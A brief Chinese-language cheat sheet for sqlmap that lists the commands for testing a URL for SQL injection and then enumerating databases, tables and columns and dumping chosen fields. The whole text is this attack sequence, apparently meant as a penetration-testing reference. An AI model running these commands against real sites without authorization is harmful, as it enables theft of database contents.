参数
–batch 自动答复和判断
url 是注入点
1.检查注入点
sqlmap -u “url”
2.爆所有数据库信息
sqlmap -u “url” --dbs
3.爆当前数据库信息
sqlmap -u “url” --current-db
4.指定库名列出所有表
sqlmap -u “url”-D 数据库名 --tables
5.指定库名表名列出所有字段
sqlmap -u "url" -D 数据库名 -T 表名 --columns
6.指定库名表名字段dump出指定字段
sqlmap -u “url”-D 数据库名 -T 表名 -C 字段 --dump